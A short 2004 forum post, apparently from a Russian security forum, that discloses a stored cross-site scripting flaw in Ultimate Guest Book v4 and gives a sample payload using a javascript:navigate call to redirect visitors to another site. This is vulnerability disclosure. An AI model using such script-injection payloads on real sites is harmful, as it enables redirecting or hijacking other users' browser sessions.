Уязвимость гостевой книги  ultimate guest book v4

Discussion in 'Уязвимости' started by Егорыч+++, 17 May 2004.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Поста в этой гостевой книге проверяется лишь поверхнастно. В текст самого сообщения можно вставить любой скрипт.
    Для примера вставляем вот этот

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;a style=background-image:url(javascript:navigate('http://antichat.ru'));[/QUOTE]<span id='postcolor'>

    И получаем редирект на сайт АНТИЧАТ.

    Адрес гостевой http://www.ultimatephp.com/guestbookv4.htm